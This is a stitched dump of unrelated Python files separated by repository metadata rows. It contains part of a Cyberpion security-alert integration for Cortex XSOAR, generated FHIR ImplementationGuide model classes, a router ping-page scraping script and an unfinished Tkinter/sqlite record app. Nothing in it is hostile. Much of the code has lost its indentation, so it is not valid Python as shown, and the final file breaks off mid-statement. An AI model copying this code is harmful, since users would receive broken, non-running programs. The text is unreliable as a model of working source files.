raise Exception(f'bad response from server!. response: {json.dumps(http_response, indent=2)}')
http_response = http_response['results']
if len(http_response) == 0:
demisto.error(f'no response from server for domain: {domain}')
return {}
http_response = http_response[0]
demisto.debug(f'after getting domain state for domain- {domain}')
reverse_ips = http_response.get('ips')
if reverse_ips is None:
raise Exception(f'in server\'s response: ips is none. response: {json.dumps(http_response, indent=2)}')
if type(reverse_ips) is dict:
formatted_reverse_ips = '\n'.join(
[f'{k}: {v}' for k, v in reverse_ips.items()])
else:
formatted_reverse_ips = reverse_ips
http_response['ips'] = formatted_reverse_ips
domain_types = http_response.get('domain_types')
if domain_types is None:
raise Exception(
f'in server\'s response: domain_types is none. response: {json.dumps(http_response, indent=2)}')
domain_info = ''
for idx, domain_type in enumerate(domain_types, 1):
domain_info += f'{idx}.\n'
domain_info += '\n'.join(
[f'{k}: {v}' for k, v in domain_type.items()])
http_response['domain_types'] = domain_info
return http_response
def get_action_items(self,
min_severity: int,
alert_types: list = None,
show_only_active=True,
max_fetch: int = None,
last_fetched_creation_time: str = None,
domain: str = None
) -> List[dict]:
params = {
'verbosity': 'details',
'urgency__gte': min_severity,
'ordering': 'creation_time',
'is_open': 'true' if show_only_active else 'false'
}
if alert_types:
params['category'] = ','.join(alert_types)
if max_fetch:
params['page_size'] = max_fetch
if last_fetched_creation_time:
params['creation_time__gt'] = last_fetched_creation_time
if domain:
params['domain'] = domain
http_responses = []
# call API
params['page'] = str(1)
demisto.debug(f'getting action items, domain={domain}')
http_response = self._http_request(
method='GET',
url_suffix='/actionitems/',
params=params,
resp_type='json',
ok_codes=VALID_STATUS_CODES,
timeout=(CONNECTION_TIMEOUT, READ_TIMEOUT),
retries=NUM_OF_RETRIES,
backoff_factor=BACKOFF_FACTOR,
raise_on_status=True
)
demisto.debug(f'after getting action items, domain={domain}')
if 'results' not in http_response:
raise Exception('failed to read action items.\nError: got response without \'results\' key')
results = http_response['results']
for idx, action_item in enumerate(results):
technical_det = action_item.get('technical_details', {})
if technical_det is None:
raise Exception(f'technical details is none. {json.dumps(action_item, indent=2)}')
if type(technical_det) is dict:
formatted_technical_details = '\n'.join(
[f'{k}: {v}' for k, v in technical_det.items()])
else:
formatted_technical_details = technical_det
results[idx]['technical_details'] = formatted_technical_details
results[idx]['alert_type'] = ACTION_ITEM_TYPE_NAME
http_responses.append(results)
demisto.debug(f'finished getting action items, number of pages: {len(http_responses)}, domain={domain}')
final_results = []
for response in http_responses:
final_results += response
return final_results
def get_domain_action_items(self, domain: str,
min_severity: int,
alert_types: list = None,
show_only_active=True
) -> Dict[str, Any]:
# call API
return {
"Domain": domain,
"Vulnerabilities": self.get_action_items(domain=domain,
min_severity=min_severity,
alert_types=alert_types,
show_only_active=show_only_active,
max_fetch=None)
}
''' HELPER FUNCTIONS '''
def convert_to_demisto_severity(severity: float) -> int:
"""Maps Cyberpion severity to Cortex XSOAR severity
Converts the Cyberpion alert severity level (1 to 10, float) to Cortex XSOAR incident severity (1 to 4)
for mapping.
:type severity: ``float``
:param severity: severity as returned from the Cyberpion API (float)
:return: Cortex XSOAR Severity (1 to 4)
:rtype: ``int``
"""
# In this case the mapping is straightforward, but more complex mappings
# might be required in your integration, so a dedicated function is
# recommended. This mapping should also be documented.
    if 0 <= severity <= 2.5:
        return 1
    elif 2.5 < severity <= 5:
        return 2
    elif 5 < severity <= 7.5:
        return 3
    elif 7.5 < severity <= 10:
        return 4
raise Exception('value of severity is not between 0-10. invalid value of severity: {}'.format(severity))
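# Illustrative values (added for clarity): convert_to_demisto_severity(2.0) -> 1,
# (4.0) -> 2, (7.0) -> 3, (9.5) -> 4; anything outside 0-10 raises an exception.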
''' COMMAND FUNCTIONS '''
def test_module(client: Client) -> str:
"""Tests API connectivity and authentication'
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
    :param client: client to use
:return: 'ok' if test passed, anything else will fail the test.
:rtype: ``str``
"""
try:
client.get_domain_action_items(domain='company1.com', min_severity=2)
client.get_action_items(max_fetch=2, min_severity=1, alert_types=['PKI'])
client.get_domain_state('company1.com')
except DemistoException as e:
if 'Forbidden' in str(e):
return 'Authorization Error: make sure API Key is correctly set'
else:
raise e
return 'ok'
def fetch_incidents(client: Client,
max_fetch: int,
min_severity: int,
alert_types: list,
show_only_active: bool,
first_fetch: str = None
) -> Tuple[Dict[str, str], List[dict]]:
"""This function retrieves new alerts every interval (default is 1 minute).
:type client: ``Client``
    :param client: Cyberpion integration client to use
    :type max_fetch: ``int``
    :param max_fetch: Maximum number of incidents per fetch
:type min_severity: `int`
:param min_severity:
minimum severity of the alert to search for.
Options are 1 to 10
:type alert_types: ``List[str]``
    :param alert_types:
        types of alerts to search for. There is no list of predefined types
:type first_fetch: `str`
:param first_fetch:
first date to fetch from. if null, all incidents will be fetched
:return:
A tuple containing two elements:
next_run (``Dict[str, str]``): Contains the timestamp that will be
used in ``last_run`` on the next fetch.
incidents (``List[dict]``): List of incidents that will be created in XSOAR
:rtype: ``Tuple[Dict[str, int], List[dict]]``
"""
last_run_dict = demisto.getLastRun()
if 'last_fetch' in last_run_dict:
last_fetch = last_run_dict['last_fetch']
demisto.debug('last fetch: {}'.format(str(last_fetch)))
else:
demisto.debug('no previous data... this means this is the first time we are fetching incidents')
last_fetch = first_fetch
demisto.debug("Cyberpion fetch incidents last run time\\first fetch: {}".format(
str(last_fetch) if last_fetch else 'fetching all incidents, without time filter'))
action_items = client.get_action_items(
max_fetch=max_fetch,
min_severity=min_severity,
alert_types=alert_types,
show_only_active=show_only_active,
last_fetched_creation_time=last_fetch
)
incidents = []
for action_item in action_items:
creation_date = action_item['creation_time'] # must be string of a DATE_FORMAT
iso_format_data = datetime.strptime(creation_date, DATE_FORMAT).replace(
tzinfo=timezone.utc).isoformat()
incident = {
'name': '{} - {}'.format(action_item['title'], action_item['domain']),
# name is required field, must be set
'occurred': iso_format_data,
'rawJSON': json.dumps(action_item),
'severity': convert_to_demisto_severity(action_item['urgency']),
}
# put in last_incident_date the last action_items creation date. assuming it's ordered by creation date
# last_incident_date = creation_date
incidents.append(incident)
# last incident's time added to new_last_run_dict, so we can next time ask for incidents with creation_time__gt this time
if len(action_items) > 0:
last_incident_date = action_items[-1]['creation_time']
else:
# if no action items from last_incident_date to now, keep asking next time for (new incidents) from
# last_incident_date and on
last_incident_date = last_fetch
new_last_run_dict = {'last_fetch': last_incident_date}
return new_last_run_dict, incidents
def get_domain_state_command(client: Client, args: Dict[str, Any]) -> CommandResults:
domain = args.get('domain')
if not domain:
raise ValueError('no domain specified')
demisto.debug(f'getting domain state {domain}')
domain_state = client.get_domain_state(domain)
demisto.debug(f'creating domain state table for domain {domain}')
markdown = '### Cyberpion\n'
markdown += tableToMarkdown('Domain State', domain_state, headers=[
"id",
"domain",
"ips",
"risk_rank",
"vuln_count",
"cname_chain",
"domain_types",
"discovery_date",
])
demisto.debug(f'finished creating domain state table for domain {domain}')
return CommandResults(
readable_output=markdown,
outputs_prefix='Cyberpion',
outputs_key_field='id',
outputs={"DomainState": domain_state}
)
def get_domain_action_items_command(client: Client, args: Dict[str, Any], min_severity: int, alert_types: list = None,
show_only_active: bool = True) -> CommandResults:
domain = args.get('domain')
if not domain:
raise ValueError('no domain specified')
demisto.debug(f'getting action items for domain {domain}')
domain_data = client.get_domain_action_items(domain=domain,
min_severity=min_severity,
show_only_active=show_only_active,
alert_types=alert_types,
)
demisto.debug(f'creating action items table data for domain {domain}')
markdown = '### Cyberpion\n'
markdown += tableToMarkdown('Action Items', domain_data['Vulnerabilities'], headers=[
"domain",
"category",
"urgency",
"is_open",
"creation_time",
"link",
"title",
"impact",
"summary",
"solution",
"description",
"technical_details"
])
demisto.debug(f'finished creating table data for domain {domain}. returning command result')
return CommandResults(
readable_output=markdown,
outputs_prefix='Cyberpion.DomainData',
outputs_key_field='id',
outputs=domain_data
)
''' MAIN FUNCTION '''
def main() -> None:
"""main function, parses params and runs command functions
:return:
:rtype:
"""
# get the service API url
base_url = demisto.params()['url']
api_key = demisto.params()['apikey']
min_severity = demisto.params()['minSeverity'] # mandatory
alert_types = demisto.params()['categories'] # mandatory
show_only_active = demisto.params()['ShowOnlyOpen'] # mandatory
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
demisto.debug(f'Command being called is {demisto.command()}')
try:
headers = {
'Authorization': 'Token {}'.format(api_key)
}
client = Client(
base_url=base_url,
verify=verify_certificate,
headers=headers,
proxy=proxy)
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
return_results(result)
elif demisto.command() == 'cyberpion-get-domain-state':
return_results(get_domain_state_command(client, demisto.args()))
elif demisto.command() == 'cyberpion-get-domain-action-items':
return_results(get_domain_action_items_command(client,
demisto.args(),
min_severity=min_severity,
alert_types=alert_types,
show_only_active=show_only_active))
elif demisto.command() == 'fetch-incidents':
# Set and define the fetch incidents command to run after activated via integration settings.
max_fetch = demisto.params().get('maxFetch')
first_fetch: str = demisto.params().get('first_fetch')
if first_fetch:
months_back = datetime.now() - timedelta(days=30 * int(first_fetch))
first_fetch = datetime.strftime(months_back, DATE_FORMAT)
if not max_fetch:
max_fetch = DEFAULT_MAX_INCIDENTS_TO_FETCH
try:
max_fetch = int(max_fetch)
if max_fetch > 500 or max_fetch < 1:
raise ValueError()
except ValueError:
raise ValueError('max_fetch must be an integer between 1 to 500')
if max_fetch > DEFAULT_MAX_INCIDENTS_TO_FETCH:
max_fetch = DEFAULT_MAX_INCIDENTS_TO_FETCH
new_last_run_dict, incidents = fetch_incidents(
client=client,
max_fetch=max_fetch,
min_severity=min_severity,
show_only_active=show_only_active,
alert_types=alert_types,
first_fetch=first_fetch
)
# create incidents
demisto.incidents(incidents)
# saves next_run for the time fetch-incidents is invoked
demisto.setLastRun(new_last_run_dict)
else:
raise NotImplementedError(f'no such command: {demisto.command()}')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Cyberpion integration: Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 39.282511 | 125 | 0.602055 |
43132270d11f024901d597608d82f6490984c29f
| 25,494 |
py
|
Python
|
fhirclient/r4models/implementationguide.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
fhirclient/r4models/implementationguide.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
fhirclient/r4models/implementationguide.py
|
Healthedata1/Flask-PL
|
88a2f40ca430c4cbb9fbded7fc92fdc166ebb9f1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/ImplementationGuide) on 2019-05-07.
# 2019, SMART Health IT.
from . import domainresource
class ImplementationGuide(domainresource.DomainResource):
""" A set of rules about how FHIR is used.
A set of rules of how a particular interoperability or standards problem is
solved - typically through the use of FHIR resources. This resource is used
to gather all the parts of an implementation guide into a logical whole and
to publish a computable definition of all the parts.
"""
resource_type = "ImplementationGuide"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.contact = None
""" Contact details for the publisher.
List of `ContactDetail` items (represented as `dict` in JSON). """
self.copyright = None
""" Use and/or publishing restrictions.
Type `str`. """
self.date = None
""" Date last changed.
Type `FHIRDate` (represented as `str` in JSON). """
self.definition = None
""" Information needed to build the IG.
Type `ImplementationGuideDefinition` (represented as `dict` in JSON). """
self.dependsOn = None
""" Another Implementation guide this depends on.
List of `ImplementationGuideDependsOn` items (represented as `dict` in JSON). """
self.description = None
""" Natural language description of the implementation guide.
Type `str`. """
self.experimental = None
""" For testing purposes, not real usage.
Type `bool`. """
self.fhirVersion = None
""" FHIR Version(s) this Implementation Guide targets.
List of `str` items. """
self.global_fhir = None
""" Profiles that apply globally.
List of `ImplementationGuideGlobal` items (represented as `dict` in JSON). """
self.jurisdiction = None
""" Intended jurisdiction for implementation guide (if applicable).
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.license = None
""" SPDX license code for this IG (or not-open-source).
Type `str`. """
self.manifest = None
""" Information about an assembled IG.
Type `ImplementationGuideManifest` (represented as `dict` in JSON). """
self.name = None
""" Name for this implementation guide (computer friendly).
Type `str`. """
self.packageId = None
""" NPM Package name for IG.
Type `str`. """
self.publisher = None
""" Name of the publisher (organization or individual).
Type `str`. """
self.status = None
""" draft | active | retired | unknown.
Type `str`. """
self.title = None
""" Name for this implementation guide (human friendly).
Type `str`. """
self.url = None
""" Canonical identifier for this implementation guide, represented as
a URI (globally unique).
Type `str`. """
self.useContext = None
""" The context that the content is intended to support.
List of `UsageContext` items (represented as `dict` in JSON). """
self.version = None
""" Business version of the implementation guide.
Type `str`. """
super(ImplementationGuide, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuide, self).elementProperties()
js.extend([
("contact", "contact", contactdetail.ContactDetail, True, None, False),
("copyright", "copyright", str, False, None, False),
("date", "date", fhirdate.FHIRDate, False, None, False),
("definition", "definition", ImplementationGuideDefinition, False, None, False),
("dependsOn", "dependsOn", ImplementationGuideDependsOn, True, None, False),
("description", "description", str, False, None, False),
("experimental", "experimental", bool, False, None, False),
("fhirVersion", "fhirVersion", str, True, None, True),
("global_fhir", "global", ImplementationGuideGlobal, True, None, False),
("jurisdiction", "jurisdiction", codeableconcept.CodeableConcept, True, None, False),
("license", "license", str, False, None, False),
("manifest", "manifest", ImplementationGuideManifest, False, None, False),
("name", "name", str, False, None, True),
("packageId", "packageId", str, False, None, True),
("publisher", "publisher", str, False, None, False),
("status", "status", str, False, None, True),
("title", "title", str, False, None, False),
("url", "url", str, False, None, True),
("useContext", "useContext", usagecontext.UsageContext, True, None, False),
("version", "version", str, False, None, False),
])
return js
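# --- Usage sketch (added for illustration; not part of the generated model) ---
# fhirclient models can be instantiated from a JSON dictionary; the values
# below are assumptions chosen only to show the expected shapes.
#
# ig = ImplementationGuide({
#     "resourceType": "ImplementationGuide",
#     "url": "http://example.org/fhir/ImplementationGuide/example",
#     "name": "ExampleIG",
#     "status": "draft",
#     "packageId": "example.fhir.ig",
#     "fhirVersion": ["4.0.0"],
# })
# print(ig.name, ig.status)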
from . import backboneelement
class ImplementationGuideDefinition(backboneelement.BackboneElement):
""" Information needed to build the IG.
The information needed by an IG publisher tool to publish the whole
implementation guide.
"""
resource_type = "ImplementationGuideDefinition"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.grouping = None
""" Grouping used to present related resources in the IG.
List of `ImplementationGuideDefinitionGrouping` items (represented as `dict` in JSON). """
self.page = None
""" Page/Section in the Guide.
Type `ImplementationGuideDefinitionPage` (represented as `dict` in JSON). """
self.parameter = None
""" Defines how IG is built by tools.
List of `ImplementationGuideDefinitionParameter` items (represented as `dict` in JSON). """
self.resource = None
""" Resource in the implementation guide.
List of `ImplementationGuideDefinitionResource` items (represented as `dict` in JSON). """
self.template = None
""" A template for building resources.
List of `ImplementationGuideDefinitionTemplate` items (represented as `dict` in JSON). """
super(ImplementationGuideDefinition, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinition, self).elementProperties()
js.extend([
("grouping", "grouping", ImplementationGuideDefinitionGrouping, True, None, False),
("page", "page", ImplementationGuideDefinitionPage, False, None, False),
("parameter", "parameter", ImplementationGuideDefinitionParameter, True, None, False),
("resource", "resource", ImplementationGuideDefinitionResource, True, None, True),
("template", "template", ImplementationGuideDefinitionTemplate, True, None, False),
])
return js
class ImplementationGuideDefinitionGrouping(backboneelement.BackboneElement):
""" Grouping used to present related resources in the IG.
A logical group of resources. Logical groups can be used when building
pages.
"""
resource_type = "ImplementationGuideDefinitionGrouping"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.description = None
""" Human readable text describing the package.
Type `str`. """
self.name = None
""" Descriptive name for the package.
Type `str`. """
super(ImplementationGuideDefinitionGrouping, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionGrouping, self).elementProperties()
js.extend([
("description", "description", str, False, None, False),
("name", "name", str, False, None, True),
])
return js
class ImplementationGuideDefinitionPage(backboneelement.BackboneElement):
""" Page/Section in the Guide.
A page / section in the implementation guide. The root page is the
implementation guide home page.
"""
resource_type = "ImplementationGuideDefinitionPage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.generation = None
""" html | markdown | xml | generated.
Type `str`. """
self.nameReference = None
""" Where to find that page.
Type `FHIRReference` (represented as `dict` in JSON). """
self.nameUrl = None
""" Where to find that page.
Type `str`. """
self.page = None
""" Nested Pages / Sections.
List of `ImplementationGuideDefinitionPage` items (represented as `dict` in JSON). """
self.title = None
""" Short title shown for navigational assistance.
Type `str`. """
super(ImplementationGuideDefinitionPage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionPage, self).elementProperties()
js.extend([
("generation", "generation", str, False, None, True),
("nameReference", "nameReference", fhirreference.FHIRReference, False, "name", True),
("nameUrl", "nameUrl", str, False, "name", True),
("page", "page", ImplementationGuideDefinitionPage, True, None, False),
("title", "title", str, False, None, True),
])
return js
class ImplementationGuideDefinitionParameter(backboneelement.BackboneElement):
""" Defines how IG is built by tools.
"""
resource_type = "ImplementationGuideDefinitionParameter"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.code = None
""" apply | path-resource | path-pages | path-tx-cache | expansion-
parameter | rule-broken-links | generate-xml | generate-json |
generate-turtle | html-template.
Type `str`. """
self.value = None
""" Value for named type.
Type `str`. """
super(ImplementationGuideDefinitionParameter, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionParameter, self).elementProperties()
js.extend([
("code", "code", str, False, None, True),
("value", "value", str, False, None, True),
])
return js
class ImplementationGuideDefinitionResource(backboneelement.BackboneElement):
""" Resource in the implementation guide.
A resource that is part of the implementation guide. Conformance resources
(value set, structure definition, capability statements etc.) are obvious
candidates for inclusion, but any kind of resource can be included as an
example resource.
"""
resource_type = "ImplementationGuideDefinitionResource"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.description = None
""" Reason why included in guide.
Type `str`. """
self.exampleBoolean = None
""" Is an example/What is this an example of?.
Type `bool`. """
self.exampleCanonical = None
""" Is an example/What is this an example of?.
Type `str`. """
self.fhirVersion = None
""" Versions this applies to (if different to IG).
List of `str` items. """
self.groupingId = None
""" Grouping this is part of.
Type `str`. """
self.name = None
""" Human Name for the resource.
Type `str`. """
self.reference = None
""" Location of the resource.
Type `FHIRReference` (represented as `dict` in JSON). """
super(ImplementationGuideDefinitionResource, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionResource, self).elementProperties()
js.extend([
("description", "description", str, False, None, False),
("exampleBoolean", "exampleBoolean", bool, False, "example", False),
("exampleCanonical", "exampleCanonical", str, False, "example", False),
("fhirVersion", "fhirVersion", str, True, None, False),
("groupingId", "groupingId", str, False, None, False),
("name", "name", str, False, None, False),
("reference", "reference", fhirreference.FHIRReference, False, None, True),
])
return js
class ImplementationGuideDefinitionTemplate(backboneelement.BackboneElement):
""" A template for building resources.
"""
resource_type = "ImplementationGuideDefinitionTemplate"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.code = None
""" Type of template specified.
Type `str`. """
self.scope = None
""" The scope in which the template applies.
Type `str`. """
self.source = None
""" The source location for the template.
Type `str`. """
super(ImplementationGuideDefinitionTemplate, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDefinitionTemplate, self).elementProperties()
js.extend([
("code", "code", str, False, None, True),
("scope", "scope", str, False, None, False),
("source", "source", str, False, None, True),
])
return js
class ImplementationGuideDependsOn(backboneelement.BackboneElement):
""" Another Implementation guide this depends on.
Another implementation guide that this implementation depends on.
Typically, an implementation guide uses value sets, profiles etc.defined in
other implementation guides.
"""
resource_type = "ImplementationGuideDependsOn"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.packageId = None
""" NPM Package name for IG this depends on.
Type `str`. """
self.uri = None
""" Identity of the IG that this depends on.
Type `str`. """
self.version = None
""" Version of the IG.
Type `str`. """
super(ImplementationGuideDependsOn, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideDependsOn, self).elementProperties()
js.extend([
("packageId", "packageId", str, False, None, False),
("uri", "uri", str, False, None, True),
("version", "version", str, False, None, False),
])
return js
class ImplementationGuideGlobal(backboneelement.BackboneElement):
""" Profiles that apply globally.
A set of profiles that all resources covered by this implementation guide
must conform to.
"""
resource_type = "ImplementationGuideGlobal"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.profile = None
""" Profile that all resources must conform to.
Type `str`. """
self.type = None
""" Type this profile applies to.
Type `str`. """
super(ImplementationGuideGlobal, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideGlobal, self).elementProperties()
js.extend([
("profile", "profile", str, False, None, True),
("type", "type", str, False, None, True),
])
return js
class ImplementationGuideManifest(backboneelement.BackboneElement):
""" Information about an assembled IG.
Information about an assembled implementation guide, created by the
publication tooling.
"""
resource_type = "ImplementationGuideManifest"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.image = None
""" Image within the IG.
List of `str` items. """
self.other = None
""" Additional linkable file in IG.
List of `str` items. """
self.page = None
""" HTML page within the parent IG.
List of `ImplementationGuideManifestPage` items (represented as `dict` in JSON). """
self.rendering = None
""" Location of rendered implementation guide.
Type `str`. """
self.resource = None
""" Resource in the implementation guide.
List of `ImplementationGuideManifestResource` items (represented as `dict` in JSON). """
super(ImplementationGuideManifest, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideManifest, self).elementProperties()
js.extend([
("image", "image", str, True, None, False),
("other", "other", str, True, None, False),
("page", "page", ImplementationGuideManifestPage, True, None, False),
("rendering", "rendering", str, False, None, False),
("resource", "resource", ImplementationGuideManifestResource, True, None, True),
])
return js
class ImplementationGuideManifestPage(backboneelement.BackboneElement):
""" HTML page within the parent IG.
Information about a page within the IG.
"""
resource_type = "ImplementationGuideManifestPage"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.anchor = None
""" Anchor available on the page.
List of `str` items. """
self.name = None
""" HTML page name.
Type `str`. """
self.title = None
""" Title of the page, for references.
Type `str`. """
super(ImplementationGuideManifestPage, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideManifestPage, self).elementProperties()
js.extend([
("anchor", "anchor", str, True, None, False),
("name", "name", str, False, None, True),
("title", "title", str, False, None, False),
])
return js
class ImplementationGuideManifestResource(backboneelement.BackboneElement):
""" Resource in the implementation guide.
A resource that is part of the implementation guide. Conformance resources
(value set, structure definition, capability statements etc.) are obvious
candidates for inclusion, but any kind of resource can be included as an
example resource.
"""
resource_type = "ImplementationGuideManifestResource"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.exampleBoolean = None
""" Is an example/What is this an example of?.
Type `bool`. """
self.exampleCanonical = None
""" Is an example/What is this an example of?.
Type `str`. """
self.reference = None
""" Location of the resource.
Type `FHIRReference` (represented as `dict` in JSON). """
self.relativePath = None
""" Relative path for page in IG.
Type `str`. """
super(ImplementationGuideManifestResource, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ImplementationGuideManifestResource, self).elementProperties()
js.extend([
("exampleBoolean", "exampleBoolean", bool, False, "example", False),
("exampleCanonical", "exampleCanonical", str, False, "example", False),
("reference", "reference", fhirreference.FHIRReference, False, None, True),
("relativePath", "relativePath", str, False, None, False),
])
return js
import sys
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
from . import contactdetail
except ImportError:
contactdetail = sys.modules[__package__ + '.contactdetail']
try:
from . import fhirdate
except ImportError:
fhirdate = sys.modules[__package__ + '.fhirdate']
try:
from . import fhirreference
except ImportError:
fhirreference = sys.modules[__package__ + '.fhirreference']
try:
from . import usagecontext
except ImportError:
usagecontext = sys.modules[__package__ + '.usagecontext']
| 39.041348 | 117 | 0.601906 |
4a6bab9bd58e5283a4d01166b335fae8bbe5442a
| 628 |
py
|
Python
|
P8702N/pingTest.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2017-12-12T13:58:08.000Z
|
2017-12-12T13:58:08.000Z
|
P8702N/pingTest.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | null | null | null |
P8702N/pingTest.py
|
wittrup/crap
|
a77474588fd54a5a998e24df7b1e6e2ab473ded1
|
[
"MIT"
] | 1 |
2019-11-03T10:16:35.000Z
|
2019-11-03T10:16:35.000Z
|
import impat
impat.addfolder('python')
import requests
from FunCom import find_between
from session import login, host, cookies
if login.status_code == requests.codes.ok and cookies['SESSION'] != '':
print('=~=~=~=~=~=~=~=~=~=~=~= =~=~=~=~=~=~=~=~=~=~=~=')
f = requests.get('http://%s/pages/maintenance/disagnostic/pingTest.html' % host, cookies=login.cookies)
form_action = find_between(f.text, '<form action="', '" method="post">')
sessionKey = find_between(f.text, '<input type="hidden" name="sessionKey" id="sessionKey" value="', '">')
print(form_action, sessionKey)
| 44.857143 | 109 | 0.624204 |
6029cebe3aab069699f06fc1541d6645afb853cc
| 2,952 |
py
|
Python
|
python_gui_tkinter/KALU/GARBAGE1/SAFE27JUL/AppOperations.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE27JUL/AppOperations.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/KALU/GARBAGE1/SAFE27JUL/AppOperations.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import sqlite3
from tkinter import *
from tkinter import font
from tkinter.filedialog import askopenfilename
from datetime import datetime
# making the connection
conn = sqlite3.connect("appDb.sqlite")
cur = conn.cursor()
# email address is the primary key
cur.executescript('''
CREATE TABLE IF NOT EXISTS details(
sl_no INTEGER,
name TEXT,
e_mail TEXT,
flat TEXT,
tower TEXT,
area INTEGER,
parking TEXT,
recpt_fees INTEGER,
addr TEXT,
contact_no TEXT,
timestmp DATE
);
''')
total_record = 0
class Rec:
def countTotalRec():
cur.execute('''SELECT count( * ) as total_record FROM details''')
total_record = cur.fetchone()[0]
print("Total data present : ",total_record)
return total_record
def timestmp():
tmestmp = datetime.now().isoformat(timespec='seconds')
return tmestmp
class AppOperations:
def save_root():
print("Saving your data !")
conn.commit()
def insertData(name, e_mail, tower, flat, area, parking, recpt_fees, addr, contact_no):
try :
cur.execute('''INSERT
INTO details (sl_no, name, e_mail, tower, flat, area, parking, recpt_fees, addr, contact_no, timestmp)
VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ? )''',
( (Rec.countTotalRec()+1),name,e_mail,tower,flat,area,parking,recpt_fees,addr,contact_no,Rec.timestmp(),))
conn.commit()
return 1
except:
